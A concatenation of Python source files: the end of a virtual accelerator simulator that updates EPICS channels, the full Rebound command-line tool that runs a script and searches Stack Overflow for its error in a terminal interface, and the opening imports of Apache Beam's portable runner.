self._readfieldmap[elem.name][elem.fields.phase], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.phase], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.energy], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.energy], _DEFAULT_ERROR_VALUE)
elif isinstance(elem, PMElement):
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.xrms], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.xrms], _DEFAULT_ERROR_VALUE)
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
self._readfieldmap[elem.name][elem.fields.yrms], _DEFAULT_ERROR_VALUE)
catools.caput(self._readfieldmap[elem.name][elem.fields.yrms], _DEFAULT_ERROR_VALUE)
else:
_LOGGER.warning("VirtualAccelerator: Output from element type not supported: %s",
type(elem).__name__)
# Allow the BPM, PM, etc. readbacks to update
# before the device setting readbacks PVs.
cothread.Yield()
for name, value in self._csetmap.items():
name, field = self._fieldmap[name]
_LOGGER.debug("VirtualAccelerator: Update read: %s to %s", value[1], settings[name][field])
catools.caput(value[1], settings[name][field])
# Sleep for a fraction (10%) of the total execution time
# when one simulation costs more than 0.50 seconds.
# Otherwise, sleep for the rest of 1 second.
# If a scan is being done on this virtual accelerator,
# then the scan server has a period of time to update
# setpoints before the next run of IMPACT.
if (time.time() - start) > 0.50:
cothread.Sleep((time.time() - start) * 0.1)
else:
cothread.Sleep(1.0 - (time.time() - start))
def _handle_cset_monitor(self, value, idx):
"""Handle updates of CSET channels by updating
the corresponding setting and RSET channel.
"""
cset = self._csetmap.items()[idx]
_LOGGER.debug("VirtualAccelerator: Update cset: '%s' to %s", cset[0], value)
name, field = self._fieldmap[cset[0]]
self._settings[name][field] = float(value)
def _handle_noise_monitor(self, value):
"""Handle updates of the NOISE channel.
"""
_LOGGER.debug("VirtualAccelerator: Update noise: %s", value)
self._noise = float(value)
def _copy_settings_with_noise(self):
s = deepcopy(self._settings)
for name, field in self._fieldmap.values():
s[name][field] = s[name][field] + s[name][field] * self._noise * 2.0 * (random.random() - 0.5)
return s
def _write_epicsdb(self, buf):
for record in self._epicsdb:
buf.write("record({}, \"{}\") {{\r\n".format(record[0], record[1]))
for name, value in record[2].items():
if value is None:
pass # ignore fields with value None
elif isinstance(value, int):
buf.write(" field(\"{}\", {})\r\n".format(name, value))
elif isinstance(value, float):
buf.write(" field(\"{}\", {})\r\n".format(name, value))
else:
buf.write(" field(\"{}\", \"{}\")\r\n".format(name, value))
buf.write("}\r\n\r\n")
def _normalize_phase(phase):
while phase >= 360.0:
phase -= 360.0
while phase < 0.0:
phase += 360.0
return phase
class _Cothread_Popen(object):
"""A helpful wrapper class that integrates the python
standard popen() method with the Cothread library.
"""
def __init__(self, *args, **kwargs):
self._process = subprocess.Popen(*args, **kwargs)
self._output = None
self._event = None
def communicate(self, input=None): # @ReservedAssignment
"""Start a real OS thread to wait for process communication.
"""
if self._event is None:
self._event = cothread.Event()
threading.Thread(target=self._communicate_thread, args=(input,)).start()
elif input is not None:
raise RuntimeError("_Cothread_Popen: Communicate method already called")
self._event.Wait()
return (self._output[0], self._output[1], self._process.poll())
def _communicate_thread(self, input): # @ReservedAssignment
"""Executes in separate OS thread. Wait for communication
then return the output to the cothread context.
"""
output = self._process.communicate(input)
cothread.Callback(self._communicate_callback, output)
def _communicate_callback(self, output):
"""Record the output and then signal other cothreads.
"""
self._output = output
self._event.Signal()
def wait(self):
"""Wait for the process to complete and result the exit code.
"""
self.communicate()
return self._process.poll()
def terminate(self):
"""Send the terminate signal. See subprocess.Popen.terminate()
"""
self._process.terminate()
def kill(self):
"""Send the kill signal. See subprocess.Popen.kill()
"""
self._process.kill()
|
rebound.py
|
##########
## GLOBALS
##########
import urwid
import re
import sys
import os
from bs4 import BeautifulSoup
import requests
from queue import Queue
from subprocess import PIPE, Popen
from threading import Thread
import webbrowser
import time
from urwid.widget import (BOX, FLOW, FIXED)
import random
SO_URL = "https://stackoverflow.com"
# ASCII color codes
GREEN = '\033[92m'
GRAY = '\033[90m'
CYAN = '\033[36m'
RED = '\033[31m'
YELLOW = '\033[33m'
END = '\033[0m'
UNDERLINE = '\033[4m'
BOLD = '\033[1m'
# Scroll actions
SCROLL_LINE_UP = "line up"
SCROLL_LINE_DOWN = "line down"
SCROLL_PAGE_UP = "page up"
SCROLL_PAGE_DOWN = "page down"
SCROLL_TO_TOP = "to top"
SCROLL_TO_END = "to end"
# Scrollbar positions
SCROLLBAR_LEFT = "left"
SCROLLBAR_RIGHT = "right"
USER_AGENTS = [
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Firefox/59",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
]
##################
## FILE ATTRIBUTES
##################
def get_language(file_path):
"""Returns the language a file is written in."""
if file_path.endswith(".py"):
return "python3"
elif file_path.endswith(".js"):
return "node"
elif file_path.endswith(".go"):
return "go run"
elif file_path.endswith(".rb"):
return "ruby"
elif file_path.endswith(".java"):
return 'javac' # Compile Java Source File
elif file_path.endswith(".class"):
return 'java' # Run Java Class File
else:
return '' # Unknown language
def get_error_message(error, language):
"""Filters the stack trace from stderr and returns only the error message."""
if error == '':
return None
elif language == "python3":
if any(e in error for e in ["KeyboardInterrupt", "SystemExit", "GeneratorExit"]): # Non-compiler errors
return None
else:
return error.split('\n')[-2].strip()
elif language == "node":
return error.split('\n')[4][1:]
elif language == "go run":
return error.split('\n')[1].split(": ", 1)[1][1:]
elif language == "ruby":
error_message = error.split('\n')[0]
return error_message[error_message.rfind(": ") + 2:]
elif language == "javac":
m = re.search(r'.*error:(.*)', error.split('\n')[0])
return m.group(1) if m else None
elif language == "java":
for line in error.split('\n'):
# Multiple error formats
m = re.search(r'.*(Exception|Error):(.*)', line)
if m and m.group(2):
return m.group(2)
m = re.search(r'Exception in thread ".*" (.*)', line)
if m and m.group(1):
return m.group(1)
return None
#################
## FILE EXECUTION
#################
## Helper Functions ##
def read(pipe, funcs):
"""Reads and pushes piped output to a shared queue and appropriate lists."""
for line in iter(pipe.readline, b''):
for func in funcs:
func(line.decode("utf-8"))
pipe.close()
def write(get):
"""Pulls output from shared queue and prints to terminal."""
for line in iter(get, None):
print(line)
## Main ##
def execute(command):
"""Executes a given command and clones stdout/err to both variables and the
terminal (in real-time)."""
process = Popen(
command,
cwd=None,
shell=False,
close_fds=True,
stdout=PIPE,
stderr=PIPE,
bufsize=1
)
output, errors = [], []
pipe_queue = Queue() # Wowee, thanks CS 225
# Threads for reading stdout and stderr pipes and pushing to a shared queue
stdout_thread = Thread(target=read, args=(process.stdout, [pipe_queue.put, output.append]))
stderr_thread = Thread(target=read, args=(process.stderr, [pipe_queue.put, errors.append]))
writer_thread = Thread(target=write, args=(pipe_queue.get,)) # Thread for printing items in the queue
# Spawns each thread
for thread in (stdout_thread, stderr_thread, writer_thread):
thread.daemon = True
thread.start()
process.wait()
for thread in (stdout_thread, stderr_thread):
thread.join()
pipe_queue.put(None)
output = ' '.join(output)
errors = ' '.join(errors)
if "java" != command[0] and not os.path.isfile(command[1]): # File doesn't exist, for java, command[1] is a class name instead of a file
return (None, None)
else:
return (output, errors)
###############
## WEB SCRAPING
###############
## Helper Functions ##
def stylize_code(soup):
"""Identifies and stylizes code in a question or answer."""
# TODO: Handle blockquotes and markdown
stylized_text = []
code_blocks = [block.get_text() for block in soup.find_all("code")]
blockquotes = [block.get_text() for block in soup.find_all("blockquote")]
newline = False
for child in soup.recursiveChildGenerator():
name = getattr(child, "name", None)
if name is None: # Leaf (terminal) node
if child in code_blocks:
if newline: # Code block
#if code_blocks.index(child) == len(code_blocks) - 1: # Last code block
#child = child[:-1]
stylized_text.append(("code", u"\n%s" % str(child)))
newline = False
else: # In-line code
stylized_text.append(("code", u"%s" % str(child)))
else: # Plaintext
newline = child.endswith('\n')
stylized_text.append(u"%s" % str(child))
if type(stylized_text[-2]) == tuple:
# Remove newline from questions/answers that end with a code block
if stylized_text[-2][1].endswith('\n'):
stylized_text[-2] = ("code", stylized_text[-2][1][:-1])
return urwid.Text(stylized_text)
def get_search_results(soup):
"""Returns a list of dictionaries containing each search result."""
search_results = []
for result in soup.find_all("div", class_="question-summary search-result"):
title_container = result.find_all("div", class_="result-link")[0].find_all("a")[0]
if result.find_all("div", class_="status answered") != []: # Has answers
answer_count = int(result.find_all("div", class_="status answered")[0].find_all("strong")[0].text)
elif result.find_all("div", class_="status answered-accepted") != []: # Has an accepted answer (closed)
answer_count = int(result.find_all("div", class_="status answered-accepted")[0].find_all("strong")[0].text)
else: # No answers
answer_count = 0
search_results.append({
"Title": title_container["title"],
#"Body": result.find_all("div", class_="excerpt")[0].text,
#"Votes": int(result.find_all("span", class_="vote-count-post ")[0].find_all("strong")[0].text),
"Answers": answer_count,
"URL": SO_URL + title_container["href"]
})
return search_results
def souper(url):
"""Turns a given URL into a BeautifulSoup object."""
try:
html = requests.get(url, headers={"User-Agent": random.choice(USER_AGENTS)})
except requests.exceptions.RequestException:
sys.stdout.write("\n%s%s%s" % (RED, "Rebound was unable to fetch Stack Overflow results. "
"Please check that you are connected to the internet.\n", END))
sys.exit(1)
if re.search("\.com/nocaptcha", html.url): # URL is a captcha page
return None
else:
return BeautifulSoup(html.text, "html.parser")
## Main ##
def search_stackoverflow(query):
"""Wrapper function for get_search_results."""
soup = souper(SO_URL + "/search?pagesize=50&q=%s" % query.replace(' ', '+'))
# TODO: Randomize the user agent
if soup == None:
return (None, True)
else:
return (get_search_results(soup), False)
def get_question_and_answers(url):
"""Returns details about a given question and list of its answers."""
soup = souper(url)
if soup == None: # Captcha page
return "Sorry, Stack Overflow blocked our request. Try again in a couple seconds.", "", "", ""
else:
question_title = soup.find_all('a', class_="question-hyperlink")[0].get_text()
question_stats = soup.find("div", attrs={"itemprop": "upvoteCount"}).get_text() # Vote count
question_stats += " Votes | Asked " + soup.find("time", attrs={"itemprop": "dateCreated"}).get_text() # Date created
question_desc = stylize_code(soup.find_all("div", class_="s-prose js-post-body")[0]) # TODO: Handle duplicates
answers = [stylize_code(answer) for answer in soup.find_all("div", class_="s-prose js-post-body")][1:]
if len(answers) == 0:
answers.append(urwid.Text(("no answers", u"\nNo answers for this question.")))
return question_title, question_desc, question_stats, answers
############
## INTERFACE
############
## Helper Classes ##
class Scrollable(urwid.WidgetDecoration):
# TODO: Fix scrolling behavior (works with up/down keys, not with cursor)
def sizing(self):
return frozenset([BOX,])
def selectable(self):
return True
def __init__(self, widget):
"""Box widget (wrapper) that makes a fixed or flow widget vertically scrollable."""
self._trim_top = 0
self._scroll_action = None
self._forward_keypress = None
self._old_cursor_coords = None
self._rows_max_cached = 0
self._rows_max_displayable = 0
self.__super.__init__(widget)
def render(self, size, focus=False):
maxcol, maxrow = size
# Render complete original widget
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
canv = urwid.CompositeCanvas(ow.render(ow_size, focus))
canv_cols, canv_rows = canv.cols(), canv.rows()
if canv_cols <= maxcol:
pad_width = maxcol - canv_cols
if pad_width > 0: # Canvas is narrower than available horizontal space
canv.pad_trim_left_right(0, pad_width)
if canv_rows <= maxrow:
fill_height = maxrow - canv_rows
if fill_height > 0: # Canvas is lower than available vertical space
canv.pad_trim_top_bottom(0, fill_height)
self._rows_max_displayable = maxrow
if canv_cols <= maxcol and canv_rows <= maxrow: # Canvas is small enough to fit without trimming
return canv
self._adjust_trim_top(canv, size)
# Trim canvas if necessary
trim_top = self._trim_top
trim_end = canv_rows - maxrow - trim_top
trim_right = canv_cols - maxcol
if trim_top > 0:
canv.trim(trim_top)
if trim_end > 0:
canv.trim_end(trim_end)
if trim_right > 0:
canv.pad_trim_left_right(0, -trim_right)
# Disable cursor display if cursor is outside of visible canvas parts
if canv.cursor is not None:
curscol, cursrow = canv.cursor
if cursrow >= maxrow or cursrow < 0:
canv.cursor = None
# Let keypress() know if original_widget should get keys
self._forward_keypress = bool(canv.cursor)
return canv
def keypress(self, size, key):
if self._forward_keypress:
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
# Remember previous cursor position if possible
if hasattr(ow, "get_cursor_coords"):
self._old_cursor_coords = ow.get_cursor_coords(ow_size)
key = ow.keypress(ow_size, key)
if key is None:
return None
# Handle up/down, page up/down, etc
command_map = self._command_map
if command_map[key] == urwid.CURSOR_UP:
self._scroll_action = SCROLL_LINE_UP
elif command_map[key] == urwid.CURSOR_DOWN:
self._scroll_action = SCROLL_LINE_DOWN
elif command_map[key] == urwid.CURSOR_PAGE_UP:
self._scroll_action = SCROLL_PAGE_UP
elif command_map[key] == urwid.CURSOR_PAGE_DOWN:
self._scroll_action = SCROLL_PAGE_DOWN
elif command_map[key] == urwid.CURSOR_MAX_LEFT: # "home"
self._scroll_action = SCROLL_TO_TOP
elif command_map[key] == urwid.CURSOR_MAX_RIGHT: # "end"
self._scroll_action = SCROLL_TO_END
else:
return key
self._invalidate()
def mouse_event(self, size, event, button, col, row, focus):
ow = self._original_widget
if hasattr(ow, "mouse_event"):
ow_size = self._get_original_widget_size(size)
row += self._trim_top
return ow.mouse_event(ow_size, event, button, col, row, focus)
else:
return False
def _adjust_trim_top(self, canv, size):
"""Adjust self._trim_top according to self._scroll_action"""
action = self._scroll_action
self._scroll_action = None
maxcol, maxrow = size
trim_top = self._trim_top
canv_rows = canv.rows()
if trim_top < 0:
# Negative trim_top values use bottom of canvas as reference
trim_top = canv_rows - maxrow + trim_top + 1
if canv_rows <= maxrow:
self._trim_top = 0 # Reset scroll position
return
def ensure_bounds(new_trim_top):
return max(0, min(canv_rows - maxrow, new_trim_top))
if action == SCROLL_LINE_UP:
self._trim_top = ensure_bounds(trim_top - 1)
elif action == SCROLL_LINE_DOWN:
self._trim_top = ensure_bounds(trim_top + 1)
elif action == SCROLL_PAGE_UP:
self._trim_top = ensure_bounds(trim_top - maxrow+1)
elif action == SCROLL_PAGE_DOWN:
self._trim_top = ensure_bounds(trim_top + maxrow-1)
elif action == SCROLL_TO_TOP:
self._trim_top = 0
elif action == SCROLL_TO_END:
self._trim_top = canv_rows - maxrow
else:
self._trim_top = ensure_bounds(trim_top)
if self._old_cursor_coords is not None and self._old_cursor_coords != canv.cursor:
self._old_cursor_coords = None
curscol, cursrow = canv.cursor
if cursrow < self._trim_top:
self._trim_top = cursrow
elif cursrow >= self._trim_top + maxrow:
self._trim_top = max(0, cursrow - maxrow + 1)
def _get_original_widget_size(self, size):
ow = self._original_widget
sizing = ow.sizing()
if FIXED in sizing:
return ()
elif FLOW in sizing:
return (size[0],)
def get_scrollpos(self, size=None, focus=False):
return self._trim_top
def set_scrollpos(self, position):
self._trim_top = int(position)
self._invalidate()
def rows_max(self, size=None, focus=False):
if size is not None:
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
sizing = ow.sizing()
if FIXED in sizing:
self._rows_max_cached = ow.pack(ow_size, focus)[1]
elif FLOW in sizing:
self._rows_max_cached = ow.rows(ow_size, focus)
else:
raise RuntimeError("Not a flow/box widget: %r" % self._original_widget)
return self._rows_max_cached
@property
def scroll_ratio(self):
return self._rows_max_cached / self._rows_max_displayable
class ScrollBar(urwid.WidgetDecoration):
# TODO: Change scrollbar size and color(?)
def sizing(self):
return frozenset((BOX,))
def selectable(self):
return True
def __init__(self, widget, thumb_char=u'\u2588', trough_char=' ',
side=SCROLLBAR_RIGHT, width=1):
"""Box widget that adds a scrollbar to `widget`."""
self.__super.__init__(widget)
self._thumb_char = thumb_char
self._trough_char = trough_char
self.scrollbar_side = side
self.scrollbar_width = max(1, width)
self._original_widget_size = (0, 0)
self._dragging = False
def render(self, size, focus=False):
maxcol, maxrow = size
ow = self._original_widget
ow_base = self.scrolling_base_widget
ow_rows_max = ow_base.rows_max(size, focus)
if ow_rows_max <= maxrow: # Canvas fits without scrolling - no scrollbar needed
self._original_widget_size = size
return ow.render(size, focus)
sb_width = self._scrollbar_width
self._original_widget_size = ow_size = (maxcol-sb_width, maxrow)
ow_canv = ow.render(ow_size, focus)
pos = ow_base.get_scrollpos(ow_size, focus)
posmax = ow_rows_max - maxrow
# Thumb shrinks/grows according to the ratio of
# <number of visible lines> / <number of total lines>
thumb_weight = min(1, maxrow / max(1, ow_rows_max))
thumb_height = max(1, round(thumb_weight * maxrow))
# Thumb may only touch top/bottom if the first/last row is visible
top_weight = float(pos) / max(1, posmax)
top_height = int((maxrow-thumb_height) * top_weight)
if top_height == 0 and top_weight > 0:
top_height = 1
# Bottom part is remaining space
bottom_height = maxrow - thumb_height - top_height
assert thumb_height + top_height + bottom_height == maxrow
# Create scrollbar canvas
top = urwid.SolidCanvas(self._trough_char, sb_width, top_height)
thumb = urwid.SolidCanvas(self._thumb_char, sb_width, thumb_height)
bottom = urwid.SolidCanvas(self._trough_char, sb_width, bottom_height)
sb_canv = urwid.CanvasCombine([
(top, None, False),
(thumb, None, False),
(bottom, None, False),
])
combinelist = [(ow_canv, None, True, ow_size[0]), (sb_canv, None, False, sb_width)]
if self._scrollbar_side != SCROLLBAR_LEFT:
return urwid.CanvasJoin(combinelist)
else:
return urwid.CanvasJoin(reversed(combinelist))
@property
def scrollbar_width(self):
return max(1, self._scrollbar_width)
@scrollbar_width.setter
def scrollbar_width(self, width):
self._scrollbar_width = max(1, int(width))
self._invalidate()
@property
def scrollbar_side(self):
return self._scrollbar_side
@scrollbar_side.setter
def scrollbar_side(self, side):
if side not in (SCROLLBAR_LEFT, SCROLLBAR_RIGHT):
raise ValueError("scrollbar_side must be 'left' or 'right', not %r" % side)
self._scrollbar_side = side
self._invalidate()
@property
def scrolling_base_widget(self):
"""Nearest `base_widget` that is compatible with the scrolling API."""
def orig_iter(w):
while hasattr(w, "original_widget"):
w = w.original_widget
yield w
yield w
def is_scrolling_widget(w):
return hasattr(w, "get_scrollpos") and hasattr(w, "rows_max")
for w in orig_iter(self):
if is_scrolling_widget(w):
return w
@property
def scrollbar_column(self):
if self.scrollbar_side == SCROLLBAR_LEFT:
return 0
if self.scrollbar_side == SCROLLBAR_RIGHT:
return self._original_widget_size[0]
def keypress(self, size, key):
return self._original_widget.keypress(self._original_widget_size, key)
def mouse_event(self, size, event, button, col, row, focus):
ow = self._original_widget
ow_size = self._original_widget_size
handled = False
if hasattr(ow, "mouse_event"):
handled = ow.mouse_event(ow_size, event, button, col, row, focus)
if not handled and hasattr(ow, "set_scrollpos"):
if button == 4: # Scroll wheel up
pos = ow.get_scrollpos(ow_size)
if pos > 0:
ow.set_scrollpos(pos - 1)
return True
elif button == 5: # Scroll wheel down
pos = ow.get_scrollpos(ow_size)
ow.set_scrollpos(pos + 1)
return True
elif col == self.scrollbar_column:
ow.set_scrollpos(int(row*ow.scroll_ratio))
if event == "mouse press":
self._dragging = True
elif event == "mouse release":
self._dragging = False
elif self._dragging:
ow.set_scrollpos(int(row*ow.scroll_ratio))
if event == "mouse release":
self._dragging = False
return False
class SelectableText(urwid.Text):
def selectable(self):
return True
def keypress(self, size, key):
return key
## Helper Functions ##
def interleave(a, b):
result = []
while a and b:
result.append(a.pop(0))
result.append(b.pop(0))
result.extend(a)
result.extend(b)
return result
## Main ##
class App(object):
def __init__(self, search_results):
self.search_results, self.viewing_answers = search_results, False
self.palette = [
("title", "light cyan,bold", "default", "standout"),
("stats", "light green", "default", "standout"),
("menu", "black", "light cyan", "standout"),
("reveal focus", "black", "light cyan", "standout"),
("reveal viewed focus", "yellow, bold", "light cyan", "standout"),
("no answers", "light red", "default", "standout"),
("code", "brown", "default", "standout"),
("viewed", "yellow", "default", "standout")
]
self.menu = urwid.Text([
u'\n',
("menu", u" ENTER "), ("light gray", u" View answers "),
("menu", u" B "), ("light gray", u" Open browser "),
("menu", u" Q "), ("light gray", u" Quit"),
])
results = list(map(lambda result: urwid.AttrMap(SelectableText(self._stylize_title(result)), None, "reveal focus"), self.search_results)) # TODO: Add a wrap='clip' attribute
self.content = urwid.SimpleListWalker(results)
self.content_container = urwid.ListBox(self.content)
layout = urwid.Frame(body=self.content_container, footer=self.menu)
self.main_loop = urwid.MainLoop(layout, self.palette, unhandled_input=self._handle_input)
self.original_widget = self.main_loop.widget
self.main_loop.run()
def _handle_input(self, input):
if input == "enter" or (input[0]=='meta mouse press' and input[1]==1): # View answers Either press Enter or "ALT + Left Click"
url = self._get_selected_link()
if url != None:
self.viewing_answers = True
question_title, question_desc, question_stats, answers = get_question_and_answers(url)
pile = urwid.Pile(self._stylize_question(question_title, question_desc, question_stats) + [urwid.Divider('*')] +
interleave(answers, [urwid.Divider('-')] * (len(answers) - 1)))
padding = ScrollBar(Scrollable(urwid.Padding(pile, left=2, right=2)))
#filler = urwid.Filler(padding, valign="top")
linebox = urwid.LineBox(padding)
menu = urwid.Text([
u'\n',
("menu", u" ESC "), ("light gray", u" Go back "),
("menu", u" B "), ("light gray", u" Open browser "),
("menu", u" Q "), ("light gray", u" Quit"),
])
# highlight the selected answer
_, idx = self.content_container.get_focus()
txt = self.content[idx].original_widget.text
self.content[idx] = urwid.AttrMap(SelectableText(txt), 'viewed', 'reveal viewed focus')
self.main_loop.widget = urwid.Frame(body=urwid.Overlay(linebox, self.content_container, "center", ("relative", 60), "middle", 23), footer=menu)
elif input in ('b', 'B') or (input[0]=='ctrl mouse press' and input[1]==1): # Open link Either press (B or b) or "CTRL + Left Click"
url = self._get_selected_link()
if url != None:
webbrowser.open(url)
elif input == "esc": # Close window
if self.viewing_answers:
self.main_loop.widget = self.original_widget
self.viewing_answers = False
else:
raise urwid.ExitMainLoop()
elif input in ('q', 'Q'): # Quit
raise urwid.ExitMainLoop()
def _get_selected_link(self):
focus_widget, idx = self.content_container.get_focus() # Gets selected item
title = focus_widget.base_widget.text
for result in self.search_results:
if title == self._stylize_title(result): # Found selected title's search_result dict
return result["URL"]
def _stylize_title(self, search_result):
if search_result["Answers"] == 1:
return "%s (1 Answer)" % search_result["Title"]
else:
return "%s (%s Answers)" % (search_result["Title"], search_result["Answers"])
def _stylize_question(self, title, desc, stats):
new_title = urwid.Text(("title", u"%s" % title))
new_stats = urwid.Text(("stats", u"%s\n" % stats))
return [new_title, desc, new_stats]
#######
## MAIN
#######
## Helper Functions ##
def confirm(question):
"""Prompts a given question and handles user input."""
valid = {"yes": True, 'y': True, "ye": True,
"no": False, 'n': False, '': True}
prompt = " [Y/n] "
while True:
print(BOLD + CYAN + question + prompt + END)
choice = input().lower()
if choice in valid:
return valid[choice]
print("Please respond with 'yes' or 'no' (or 'y' or 'n').\n")
def print_help():
"""Prints usage instructions."""
print("%sRebound, V1.1.9a1 - Made by @shobrook%s\n" % (BOLD, END))
print("Command-line tool that automatically searches Stack Overflow and displays results in your terminal when you get a compiler error.")
print("\n\n%sUsage:%s $ rebound %s[file_name]%s\n" % (UNDERLINE, END, YELLOW, END))
print("\n$ python3 %stest.py%s => $ rebound %stest.py%s" % (YELLOW, END, YELLOW, END))
print("\n$ node %stest.js%s => $ rebound %stest.js%s\n" % (YELLOW, END, YELLOW, END))
print("\nIf you just want to query Stack Overflow, use the -q parameter: $ rebound -q %sWhat is an array comprehension?%s\n\n" % (YELLOW, END))
## Main ##
def main():
if len(sys.argv) == 1 or sys.argv[1].lower() == "-h" or sys.argv[1].lower() == "--help":
print_help()
elif sys.argv[1].lower() == "-q" or sys.argv[1].lower() == "--query":
query = ' '.join(sys.argv[2:])
search_results, captcha = search_stackoverflow(query)
if search_results != []:
if captcha:
print("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END))
return
else:
App(search_results) # Opens interface
else:
print("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END))
else:
language = get_language(sys.argv[1].lower()) # Gets the language name
if language == '': # Unknown language
print("\n%s%s%s" % (RED, "Sorry, Rebound doesn't support this file type.\n", END))
return
file_path = sys.argv[1:]
if language == 'java':
file_path = [f.replace('.class', '') for f in file_path]
output, error = execute([language] + file_path) # Compiles the file and pipes stdout
if (output, error) == (None, None): # Invalid file
return
error_msg = get_error_message(error, language) # Prepares error message for search
if error_msg != None:
language = 'java' if language == 'javac' else language # Fix language compiler command
query = "%s %s" % (language, error_msg)
search_results, captcha = search_stackoverflow(query)
if search_results != []:
if captcha:
print("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END))
return
elif confirm("\nDisplay Stack Overflow results?"):
App(search_results) # Opens interface
else:
print("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END))
else:
print("\n%s%s%s" % (CYAN, "No error detected :)\n", END))
return
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import functools
import itertools
import logging
import threading
import time
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
